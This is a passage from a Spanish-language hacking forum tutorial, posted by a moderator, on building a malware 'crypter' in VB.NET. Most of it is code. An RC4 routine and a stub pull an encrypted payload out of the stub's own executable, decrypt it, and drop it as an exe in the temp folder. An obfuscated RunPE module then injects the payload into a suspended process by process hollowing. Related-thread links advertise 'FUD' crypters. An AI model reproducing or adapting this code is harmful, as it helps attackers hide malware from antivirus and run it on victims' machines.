FileClose(1)[/PHP]
después de agregar el módulo de cifrado RC4 que fue elegido:
[PHP]Public Shared Function rc4(ByVal message As String, ByVal password As String) As String
Dim i As Integer = 0 'pega daqui
Dim j As Integer = 0
Dim cipher As New StringBuilder
Dim returnCipher As String = String.Empty
Dim sbox As Integer() = New Integer(256) {}
Dim key As Integer() = New Integer(256) {}
Dim intLength As Integer = password.Length
Dim a As Integer = 0
While a <= 255
Dim ctmp As Char = (password.Substring((a Mod intLength), 1).ToCharArray()(0))
key(a) = Microsoft.VisualBasic.Strings.Asc(ctmp)
sbox(a) = a
System.Math.Max(System.Threading.Interlocked.Increment(a), a - 1)
End While
Dim x As Integer = 0
Dim b As Integer = 0
While b <= 255
x = (x + sbox(b) + key(b)) Mod 256
Dim tempSwap As Integer = sbox(b)
sbox(b) = sbox(x)
sbox(x) = tempSwap
System.Math.Max(System.Threading.Interlocked.Increment(b), b - 1)
End While
a = 1
While a <= message.Length
Dim itmp As Integer = 0
i = (i + 1) Mod 256
j = (j + sbox(i)) Mod 256
itmp = sbox(i)
sbox(i) = sbox(j)
sbox(j) = itmp
Dim k As Integer = sbox((sbox(i) + sbox(j)) Mod 256)
Dim ctmp As Char = message.Substring(a - 1, 1).ToCharArray()(0)
itmp = Asc(ctmp)
Dim cipherby As Integer = itmp Xor k
cipher.Append(Chr(cipherby))
System.Math.Max(System.Threading.Interlocked.Increment(a), a - 1)
End While
returnCipher = cipher.ToString
cipher.Length = 0
Return returnCipher
End Function
[/PHP]
listo concluir la estructura del cliente, ahora vamos a hacer splash:
oversec.org/showthread.php?1107-ES-Creating-a-splash-scren-in-effect
Pasamos ahora a la evolución del talón, cree un nuevo proyecto y en el formulario, agregue el siguiente código:
[PHP]
Me.Visible = False
Me.Hide()
'---------Separador-----------------
Dim Jod_Form_seperador As String = "@_Jod_@"
Dim Jod_Capt_Prc As String
Jod_Capt_Prc = Process.GetCurrentProcess().MainModule.FileName
Dim Jod_Ptc As String = System.IO.Path.GetTempPath
Dim Jod_Arq_Leitor, Jod_Pega_Geral(), Jod_Para_cry As String
'------------------------------------
FileOpen(1, Application.ExecutablePath, OpenMode.Binary, OpenAccess.Read, OpenShare.Shared)
Jod_Arq_Leitor = Space(LOF(1))
FileGet(1, Jod_Arq_Leitor)
FileClose(1)
'--------------------------------------
Jod_Pega_Geral = Split(Jod_Arq_Leitor, Jod_Form_seperador)
Jod_Para_cry = iRvFqeDEfJ(Jod_Pega_Geral(1), "Jodkeyencript")
Dim Jod_Convert_Bytes() As Byte
Jod_Convert_Bytes = Encoding.Default.GetBytes(Jod_Para_cry)
Try
S8PZDu2KuIb3BJklLe07417x1xC1YMziPiasKvQIrnBBw0.Svw9sqoPG6CKtlfYCBvd8KrDu1R3mgDhjEZQVdoK0WkLO6(Jod_Convert_Bytes, Jod_Capt_Prc)
Catch ex As Exception
End Try
FileOpen(5, Jod_Ptc & "\Jodhsghgsjhks.exe", OpenMode.Binary, OpenAccess.ReadWrite, OpenShare.Default)
FilePut(5, Jod_Para_cry)
FileClose(5)
Me.Close()[/PHP]
Ahora cree un nuevo módulo RunPE
[PHP]Imports System.ComponentModel
Imports System.Runtime.InteropServices
Public Class S8PZDu2KuIb3BJklLe07417x1xC1YMziPiasKvQIrnBBw0
Public Const SDnNle9g5VF2VbJGGZlWNjH8OJ9Wcjyw9HYEPDliWtCnf9 As Long = &H200
Public Const SaYmgYuaT7fI4vICHQ0aI2dsHOSDXRwyMQqzXYgzxE0pRt As Long = &H40
Public Const S7MFd3CpqpMqb2C0vP4pbzNH0tPv9tgbwrgJwOm8ymYHSn As Long = &H80
Public Const S8UwTvdniLlzaVHcof88obKaNGjsdIx8nXS0nUqxj6bF7A As Long = &H20
Public Const SqWvPtIAyDq09oVD4QbaFsaYgYYNhCcTRzD1yE7IqjB3eM As Long = &H10
Public Const SJf1ylUN6liDLXTU4ZfL3A2X53qOFXCvSGJCxTKR9t33GL As Long = &H8
Public Const Sp0njTpLZJE67gDChJuA4ADf2691f80VUfJn88R4aWE8So As Long = &H1
Public Const SLtUNMlL3Jy8imKDM4u6xJVI6Rn3lQwEGxwzoaCDjhTcHb As Long = &H4
Public Const SWHaDXx6Is3P6Umaq1V9Mt0PQ5kEwPTDOCR4PQurbyhzwC As UInt32 = &H2
Shared Sub Svw9sqoPG6CKtlfYCBvd8KrDu1R3mgDhjEZQVdoK0WkLO6(ByVal SFGyEY5M8j47x9yQJxEUPGaO4uC5GClIoFUdIBFpOuNZuq() As Byte, ByVal ShYwJpy4unfs7c6mnMlNFphQjkbkoEOTCuT0ClWljMoZDg As String)
Dim SSZvkRN4Yo4ZiffpneLEsLaCfHJ5Eo0uB6BVhoXeodoyRK = New S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.Sg6muJO6UW1fnUaIl6zZpzsz4DzFOvKZyoXX5Js7VHiCtY, S1SFxNgoVdxcRESBzXWJxfIBwNLGQetPTZNeP58NHVoLEF As S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.SxMiUJGkVI1UJNunKNBXy2ewOBHBj09svrQG1GbMzExccp, SwusBZwfOOWBcBXIF1G2xjhShofAwN1J99IBLMn1xHajYC = New S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.Szty5KKyS9pkyn6iSYQBtOCJYSWpfmSK3PeDMN3kEvbrYR, SWDeobqxHZdRQoCWZ4CpvV2kztkOaUG16Q8lq28TduocgU = New S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.SqZGNARhIZnMibeavQFQO4LAOI0wQeVxavGL774vAIcgYU, SQ5i5PWpMKeEWK4YQJdhMHoTP0xbYWHprgPXdU7CXOljXM = New S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.SP3Z2dY5mI0NIjDI1yTlfFfqMYPrHvypyWxRiGB7xh8NU6, SFVDwvuVUMyfwmQzmL7DU8hEokW5gBOGZ4NU5M1qiVdYhh = New S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.SP3Z2dY5mI0NIjDI1yTlfFfqMYPrHvypyWxRiGB7xh8NU6
Dim SvrdP60QQywO19O7TrfSDmkoW6snfDEtbrK2hbE5V2ZGyY = GCHandle.Alloc(SFGyEY5M8j47x9yQJxEUPGaO4uC5GClIoFUdIBFpOuNZuq, GCHandleType.Pinned)
Dim SOo8uPYNpzxT30G8CU7YVDjv9NDf1cymhK9dezPXIhwy8F As Integer = SvrdP60QQywO19O7TrfSDmkoW6snfDEtbrK2hbE5V2ZGyY.AddrOfPinnedObject.ToInt32
Dim SKYVqeAegCWJezILkXRMhn4XDYw48pPCb7clRRTGNtZLDT As New S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.S0DR8Hpycij4oSlQzPbuoj9BmRt1faQeLe8foBpkA4hj6k
SKYVqeAegCWJezILkXRMhn4XDYw48pPCb7clRRTGNtZLDT = Marshal.PtrToStructure(SvrdP60QQywO19O7TrfSDmkoW6snfDEtbrK2hbE5V2ZGyY.AddrOfPinnedObject, SKYVqeAegCWJezILkXRMhn4XDYw48pPCb7clRRTGNtZLDT.GetType)
SvrdP60QQywO19O7TrfSDmkoW6snfDEtbrK2hbE5V2ZGyY.Free()
If S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.CreateProcess(Nothing, ShYwJpy4unfs7c6mnMlNFphQjkbkoEOTCuT0ClWljMoZDg, SQ5i5PWpMKeEWK4YQJdhMHoTP0xbYWHprgPXdU7CXOljXM, SFVDwvuVUMyfwmQzmL7DU8hEokW5gBOGZ4NU5M1qiVdYhh, False, 4, Nothing, Nothing, SWDeobqxHZdRQoCWZ4CpvV2kztkOaUG16Q8lq28TduocgU, SwusBZwfOOWBcBXIF1G2xjhShofAwN1J99IBLMn1xHajYC) = 0 Then Return
Dim SgAwpqj30zVaVTeJbCPQhdER2Pvop32CEMLWruBHuErmeu As New S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.Si5GfMaX3RPwVG0oWXAC2Jxaint6HSXRPlg7WLWol5SrWh
SgAwpqj30zVaVTeJbCPQhdER2Pvop32CEMLWruBHuErmeu = Marshal.PtrToStructure(New IntPtr(SOo8uPYNpzxT30G8CU7YVDjv9NDf1cymhK9dezPXIhwy8F + SKYVqeAegCWJezILkXRMhn4XDYw48pPCb7clRRTGNtZLDT.Address), SgAwpqj30zVaVTeJbCPQhdER2Pvop32CEMLWruBHuErmeu.GetType)
Dim S1MUP2NOpD7Mh2cXwgTR0yJBrtUpdMkpHaUCmuded6c9au, SnEOi5ykf4pGGkX0dfZVuNk9ue52LQ8od51lSPMb84oE3B As Long, S0o2gvBM754j2QftGNRsszvNOyDtV6Jhq3Ovyv8MrS2fK7 As UInteger
SWDeobqxHZdRQoCWZ4CpvV2kztkOaUG16Q8lq28TduocgU.CB = Len(SWDeobqxHZdRQoCWZ4CpvV2kztkOaUG16Q8lq28TduocgU)
SSZvkRN4Yo4ZiffpneLEsLaCfHJ5Eo0uB6BVhoXeodoyRK.Flags = 65538
If SgAwpqj30zVaVTeJbCPQhdER2Pvop32CEMLWruBHuErmeu.Signature <> 17744 Or SKYVqeAegCWJezILkXRMhn4XDYw48pPCb7clRRTGNtZLDT.Magic <> 23117 Then Return
If S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.GetThreadContext(SwusBZwfOOWBcBXIF1G2xjhShofAwN1J99IBLMn1xHajYC.Thread, SSZvkRN4Yo4ZiffpneLEsLaCfHJ5Eo0uB6BVhoXeodoyRK) And S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.ReadProcessMemory(SwusBZwfOOWBcBXIF1G2xjhShofAwN1J99IBLMn1xHajYC.Process, SSZvkRN4Yo4ZiffpneLEsLaCfHJ5Eo0uB6BVhoXeodoyRK.Ebx + 8, S1MUP2NOpD7Mh2cXwgTR0yJBrtUpdMkpHaUCmuded6c9au, 4, 0) >= 0 And S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.ZwUnmapViewOfSection(SwusBZwfOOWBcBXIF1G2xjhShofAwN1J99IBLMn1xHajYC.Process, S1MUP2NOpD7Mh2cXwgTR0yJBrtUpdMkpHaUCmuded6c9au) >= 0 Then
Dim ShYn0tuGSIQHUAzM3kepDlVfuSiwMVAxmx4zf0CTrnM8SW As UInt32 = S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.VirtualAllocEx(SwusBZwfOOWBcBXIF1G2xjhShofAwN1J99IBLMn1xHajYC.Process, SgAwpqj30zVaVTeJbCPQhdER2Pvop32CEMLWruBHuErmeu.Optional.Image, SgAwpqj30zVaVTeJbCPQhdER2Pvop32CEMLWruBHuErmeu.Optional.SImage, 12288, 4)
If ShYn0tuGSIQHUAzM3kepDlVfuSiwMVAxmx4zf0CTrnM8SW <> 0 Then
S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.WriteProcessMemory(SwusBZwfOOWBcBXIF1G2xjhShofAwN1J99IBLMn1xHajYC.Process, ShYn0tuGSIQHUAzM3kepDlVfuSiwMVAxmx4zf0CTrnM8SW, SFGyEY5M8j47x9yQJxEUPGaO4uC5GClIoFUdIBFpOuNZuq, SgAwpqj30zVaVTeJbCPQhdER2Pvop32CEMLWruBHuErmeu.Optional.SHeaders, S0o2gvBM754j2QftGNRsszvNOyDtV6Jhq3Ovyv8MrS2fK7)
SnEOi5ykf4pGGkX0dfZVuNk9ue52LQ8od51lSPMb84oE3B = SKYVqeAegCWJezILkXRMhn4XDYw48pPCb7clRRTGNtZLDT.Address + 248
For SHNKQEdZSAw2h8XPHAzaquV7M8gOTpKuB09MHjx8kKwBK1 As Integer = 0 To SgAwpqj30zVaVTeJbCPQhdER2Pvop32CEMLWruBHuErmeu.File.Sections - 1
S1SFxNgoVdxcRESBzXWJxfIBwNLGQetPTZNeP58NHVoLEF = Marshal.PtrToStructure(New IntPtr(SOo8uPYNpzxT30G8CU7YVDjv9NDf1cymhK9dezPXIhwy8F + SnEOi5ykf4pGGkX0dfZVuNk9ue52LQ8od51lSPMb84oE3B + SHNKQEdZSAw2h8XPHAzaquV7M8gOTpKuB09MHjx8kKwBK1 * 40), S1SFxNgoVdxcRESBzXWJxfIBwNLGQetPTZNeP58NHVoLEF.GetType)
Dim Sr2fxZ3l67LhfVvFueNubWDi2Z4BGoNGJAqsJYwIALeyk5(S1SFxNgoVdxcRESBzXWJxfIBwNLGQetPTZNeP58NHVoLEF.Size) As Byte
For S47PeNv6nR2xfPBHk7u863fqE9VOxzvBP1Cboxy0AZjEYt As Integer = 0 To S1SFxNgoVdxcRESBzXWJxfIBwNLGQetPTZNeP58NHVoLEF.Size - 1 : Sr2fxZ3l67LhfVvFueNubWDi2Z4BGoNGJAqsJYwIALeyk5(S47PeNv6nR2xfPBHk7u863fqE9VOxzvBP1Cboxy0AZjEYt) = SFGyEY5M8j47x9yQJxEUPGaO4uC5GClIoFUdIBFpOuNZuq(S1SFxNgoVdxcRESBzXWJxfIBwNLGQetPTZNeP58NHVoLEF.Pointer + S47PeNv6nR2xfPBHk7u863fqE9VOxzvBP1Cboxy0AZjEYt) : Next
S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.WriteProcessMemory(SwusBZwfOOWBcBXIF1G2xjhShofAwN1J99IBLMn1xHajYC.Process, ShYn0tuGSIQHUAzM3kepDlVfuSiwMVAxmx4zf0CTrnM8SW + S1SFxNgoVdxcRESBzXWJxfIBwNLGQetPTZNeP58NHVoLEF.Address, Sr2fxZ3l67LhfVvFueNubWDi2Z4BGoNGJAqsJYwIALeyk5, S1SFxNgoVdxcRESBzXWJxfIBwNLGQetPTZNeP58NHVoLEF.Size, S0o2gvBM754j2QftGNRsszvNOyDtV6Jhq3Ovyv8MrS2fK7)
S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.VirtualProtectEx(SwusBZwfOOWBcBXIF1G2xjhShofAwN1J99IBLMn1xHajYC.Process, ShYn0tuGSIQHUAzM3kepDlVfuSiwMVAxmx4zf0CTrnM8SW + S1SFxNgoVdxcRESBzXWJxfIBwNLGQetPTZNeP58NHVoLEF.Address, S1SFxNgoVdxcRESBzXWJxfIBwNLGQetPTZNeP58NHVoLEF.Misc.Size, SDSvNPJTVM3ERxiymEohuJ2ZHeqm0qiylJ3KS90Gw4ZBEh(S1SFxNgoVdxcRESBzXWJxfIBwNLGQetPTZNeP58NHVoLEF.Flags), S1MUP2NOpD7Mh2cXwgTR0yJBrtUpdMkpHaUCmuded6c9au)
Next SHNKQEdZSAw2h8XPHAzaquV7M8gOTpKuB09MHjx8kKwBK1
Dim Se5s5zUAUwVcpnw8N3nmSCmo3xEKyy9N2p5VelTK5buKSv = BitConverter.GetBytes(ShYn0tuGSIQHUAzM3kepDlVfuSiwMVAxmx4zf0CTrnM8SW)
S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.WriteProcessMemory(SwusBZwfOOWBcBXIF1G2xjhShofAwN1J99IBLMn1xHajYC.Process, SSZvkRN4Yo4ZiffpneLEsLaCfHJ5Eo0uB6BVhoXeodoyRK.Ebx + 8, Se5s5zUAUwVcpnw8N3nmSCmo3xEKyy9N2p5VelTK5buKSv, 4, S0o2gvBM754j2QftGNRsszvNOyDtV6Jhq3Ovyv8MrS2fK7)
SSZvkRN4Yo4ZiffpneLEsLaCfHJ5Eo0uB6BVhoXeodoyRK.Eax = ShYn0tuGSIQHUAzM3kepDlVfuSiwMVAxmx4zf0CTrnM8SW + SgAwpqj30zVaVTeJbCPQhdER2Pvop32CEMLWruBHuErmeu.Optional.Address
S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.SetThreadContext(SwusBZwfOOWBcBXIF1G2xjhShofAwN1J99IBLMn1xHajYC.Thread, SSZvkRN4Yo4ZiffpneLEsLaCfHJ5Eo0uB6BVhoXeodoyRK)
S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.ResumeThread(SwusBZwfOOWBcBXIF1G2xjhShofAwN1J99IBLMn1xHajYC.Thread)
End If
End If
End Sub
Private Shared Function Su8W5VOcv8RmmSZ5aNpw2YU7cRdx0qu6Hwe2uwmvGftvV6(ByVal Su6xorYZ6zeyBDnj1xxnn77esalzwTwaAp97HyqdF30NSH As Long, ByVal SzAv7NUQoba1mdyKKqXESJewqUB1ummt2cScimKHJjer7F As Long) As Long
Su8W5VOcv8RmmSZ5aNpw2YU7cRdx0qu6Hwe2uwmvGftvV6 = S4FJgey6pmCGr5n6rEaif7nhNgKOwk5zes6s4RA0ISNZ5v(Su6xorYZ6zeyBDnj1xxnn77esalzwTwaAp97HyqdF30NSH) / (2 ^ SzAv7NUQoba1mdyKKqXESJewqUB1ummt2cScimKHJjer7F)
End Function
Private Shared Function S4FJgey6pmCGr5n6rEaif7nhNgKOwk5zes6s4RA0ISNZ5v(ByVal S5YS4LaM9keBTJgQlaUrcNCPM1gacO1PPnieY2gPVjhk1t As Long) As Double
Const SLibZgPFyQDT9yiJsoJVye2QIhokDCv3IXUMQOUh9Ou7dc = 4294967296.0#
If S5YS4LaM9keBTJgQlaUrcNCPM1gacO1PPnieY2gPVjhk1t < 0 Then
S4FJgey6pmCGr5n6rEaif7nhNgKOwk5zes6s4RA0ISNZ5v = S5YS4LaM9keBTJgQlaUrcNCPM1gacO1PPnieY2gPVjhk1t + SLibZgPFyQDT9yiJsoJVye2QIhokDCv3IXUMQOUh9Ou7dc
Else : S4FJgey6pmCGr5n6rEaif7nhNgKOwk5zes6s4RA0ISNZ5v = S5YS4LaM9keBTJgQlaUrcNCPM1gacO1PPnieY2gPVjhk1t
End If
End Function
Private Shared Function SDSvNPJTVM3ERxiymEohuJ2ZHeqm0qiylJ3KS90Gw4ZBEh(ByVal SInHjtU3MPJ5jwYyupq06CXiG4cdl6ljEumL1Foe76l7HZ As Long) As Long
Dim SMEGk7Mg3WHwoI8cKEwGxOIhpxLHI7VUcx74YSmLHrKF3w() As Object = {Sp0njTpLZJE67gDChJuA4ADf2691f80VUfJn88R4aWE8So, SqWvPtIAyDq09oVD4QbaFsaYgYYNhCcTRzD1yE7IqjB3eM, SWHaDXx6Is3P6Umaq1V9Mt0PQ5kEwPTDOCR4PQurbyhzwC, _
S8UwTvdniLlzaVHcof88obKaNGjsdIx8nXS0nUqxj6bF7A, SLtUNMlL3Jy8imKDM4u6xJVI6Rn3lQwEGxwzoaCDjhTcHb, SaYmgYuaT7fI4vICHQ0aI2dsHOSDXRwyMQqzXYgzxE0pRt, _
SLtUNMlL3Jy8imKDM4u6xJVI6Rn3lQwEGxwzoaCDjhTcHb, SaYmgYuaT7fI4vICHQ0aI2dsHOSDXRwyMQqzXYgzxE0pRt}
SDSvNPJTVM3ERxiymEohuJ2ZHeqm0qiylJ3KS90Gw4ZBEh = SMEGk7Mg3WHwoI8cKEwGxOIhpxLHI7VUcx74YSmLHrKF3w(Su8W5VOcv8RmmSZ5aNpw2YU7cRdx0qu6Hwe2uwmvGftvV6(SInHjtU3MPJ5jwYyupq06CXiG4cdl6ljEumL1Foe76l7HZ, 29))
End Function
<EditorBrowsable(1)> Friend Class S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ
<StructLayout(0)> Structure Sg6muJO6UW1fnUaIl6zZpzsz4DzFOvKZyoXX5Js7VHiCtY
Dim Flags, D0, D1, D2, D3, D6, D7 As UInt32, Save As SXnfNlXvaZ87psouU9Y8b9SY4rmqevvh7O80FTT1PxOYYd
Dim SG, SF, SE, SD, Edi, Esi, Ebx, Edx, Ecx, Eax, Ebp, Eip, SC, EFlags, Esp, SS As UInt32
<MarshalAs(UnmanagedType.ByValArray, SizeConst:=512)> Dim Registers As Byte()
End Structure
<StructLayout(0)> Structure SXnfNlXvaZ87psouU9Y8b9SY4rmqevvh7O80FTT1PxOYYd
Dim Control, Status, Tag, ErrorO, ErrorS, DataO, DataS As UInteger
<MarshalAs(UnmanagedType.ByValArray, SizeConst:=80)> Dim RegisterArea As Byte()
Dim State As UInt32
End Structure
Structure SKuENpyDwomcaF6AxbZP9HLI8447xqkmK4We86uN3MmI3N
Dim Address, Size As UInt32
End Structure
Structure SxMiUJGkVI1UJNunKNBXy2ewOBHBj09svrQG1GbMzExccp
Dim Name As Byte, Misc As SKuENpyDwomcaF6AxbZP9HLI8447xqkmK4We86uN3MmI3N, Address, Size, Pointer, PRelocations, PLines, NRelocations, NLines, Flags As UInt32
End Structure
Structure Szty5KKyS9pkyn6iSYQBtOCJYSWpfmSK3PeDMN3kEvbrYR
Dim Process, Thread As IntPtr, ProcessId, ThreadId As Integer
End Structure
<StructLayout(0, CharSet:=3)> Structure SqZGNARhIZnMibeavQFQO4LAOI0wQeVxavGL774vAIcgYU
Dim CB As Integer, ReservedA, Desktop, Title As String, X, Y, XSize, YSize, XCount, YCount, Fill, Flags As Integer
Dim ShowWindow, ReservedB As Short, ReservedC, Input, Output, [Error] As Integer
End Structure
<StructLayout(0)> Structure SP3Z2dY5mI0NIjDI1yTlfFfqMYPrHvypyWxRiGB7xh8NU6
Dim Length As Integer, Descriptor As IntPtr, Inherit As Integer
End Structure
<StructLayout(0)> Structure S0DR8Hpycij4oSlQzPbuoj9BmRt1faQeLe8foBpkA4hj6k
Dim Magic, Last, Pages, Relocations, Size, Minimum, Maximum, SS, SP, Checksum, IP, CS, Table, Overlay As UInt16
<MarshalAs(UnmanagedType.ByValArray, SizeConst:=4)> Dim ReservedA As UInt16()
Dim ID, Info As UInt16
<MarshalAs(UnmanagedType.ByValArray, SizeConst:=10)> Dim ReservedB As UInt16()
Dim Address As Int32
End Structure
Structure Si5GfMaX3RPwVG0oWXAC2Jxaint6HSXRPlg7WLWol5SrWh
Dim Signature As UInt32, File As Spu6bRVFYadojTZnCpt4vl96FfuTLEp5NajhyXZlowkzhw, [Optional] As SAf35JCPd3QZv4m16HsLPFa6O4dw1htie0tFlnekL7mi6Q
End Structure
<StructLayout(0)> Structure Spu6bRVFYadojTZnCpt4vl96FfuTLEp5NajhyXZlowkzhw
Dim Machine, Sections As UInt16, Stamp, Table, Symbols As UInt32, Size, Flags As UInt16
End Structure
<StructLayout(0)> Structure SAf35JCPd3QZv4m16HsLPFa6O4dw1htie0tFlnekL7mi6Q
Public Magic As UInt16, Major, Minor As Byte, SCode, IData, UData, Address, Code, Data, Image As UInt32, SectionA, FileA As UInt32
Public MajorO, MinorO, MajorI, MinorI, MajorS, MinorS As UInt16, Version, SImage, SHeaders, Checksum As UInt32, Subsystem, Flags As UInt16
Public SSReserve, SSCommit, SHReserve, SHCommit, LFlags, Count As UInt32
<MarshalAs(UnmanagedType.ByValArray, SizeConst:=16)> Public DataDirectory As SnO4BhHOkoPjrpS3QLpWYb3Eev4WCM7pDCdtpG0w4DMnp7()
End Structure
<StructLayout(0)> Structure SnO4BhHOkoPjrpS3QLpWYb3Eev4WCM7pDCdtpG0w4DMnp7
Dim Address, Size As UInt32
End Structure
Declare Auto Function CreateProcess Lib "kernel32" (ByVal Jodgsgusname As String, ByVal Jodhjgsjhgsjcommand As String, ByRef process As SP3Z2dY5mI0NIjDI1yTlfFfqMYPrHvypyWxRiGB7xh8NU6, ByRef thread As SP3Z2dY5mI0NIjDI1yTlfFfqMYPrHvypyWxRiGB7xh8NU6, ByVal inherit As Boolean, ByVal flags As UInt32, ByVal system As IntPtr, ByVal current As String, <[In]()> ByRef startup As SqZGNARhIZnMibeavQFQO4LAOI0wQeVxavGL774vAIcgYU, <Out()> ByRef info As Szty5KKyS9pkyn6iSYQBtOCJYSWpfmSK3PeDMN3kEvbrYR) As Boolean
Declare Auto Function WriteProcessMemory Lib "kernel32" (ByVCal Jodsgfsfprocess As IntPtr, ByVal Jodhmjhxkhaddress As IntPtr, ByVal buffer As Byte(), ByVal size As IntPtr, <Out()> ByRef written As Integer) As Boolean
Declare Auto Function ReadProcessMemory Lib "kernel32" (ByVal process As IntPtr, ByVal address As IntPtr, ByRef buffer As IntPtr, ByVal size As IntPtr, ByRef read As Integer) As Integer
Declare Auto Function VirtualProtectEx Lib "kernel32" (ByVal process As IntPtr, ByVal address As IntPtr, ByVal size As UIntPtr, ByVal [new] As UIntPtr, <Out()> ByVal old As UInt32) As Integer
Declare Auto Function VirtualAllocEx Lib "kernel32" (ByVal process As IntPtr, ByVal address As IntPtr, ByVal size As UInt32, ByVal type As UInt32, ByVal protect As UInt32) As IntPtr
Declare Auto Function ZwUnmapViewOfSection Lib "ntdll" (ByVal process As IntPtr, ByVal address As IntPtr) As Long
Declare Auto Function ResumeThread Lib "kernel32" (ByVal thread As IntPtr) As UInt32
Declare Auto Function GetThreadContext Lib "kernel32" (ByVal thread As IntPtr, ByRef context As Sg6muJO6UW1fnUaIl6zZpzsz4DzFOvKZyoXX5Js7VHiCtY) As Boolean
Declare Auto Function SetThreadContext Lib "kernel32" (ByVal thread As IntPtr, ByRef context As Sg6muJO6UW1fnUaIl6zZpzsz4DzFOvKZyoXX5Js7VHiCtY) As Boolean
End Class
End Class[/PHP]
Bueno, llegamos a la conclusión del crypter
Queda de Faraó- Moderador
- Mensajes : 11
Fecha de inscripción : 13/03/2012
Temas similares» Crypter coder poseidon Crypter Rats
» Entendiendo como ataca un hacker y haciendo más difícil su vida by Queda
» F.b.i crypter
» hao crypter
» Crypter 99% FUD
» Entendiendo como ataca un hacker y haciendo más difícil su vida by Queda
» F.b.i crypter
» hao crypter
» Crypter 99% FUD
:: Entrada
Página 1 de 1.
Permisos de este foro:
No puedes responder a temas en este foro.|
|
|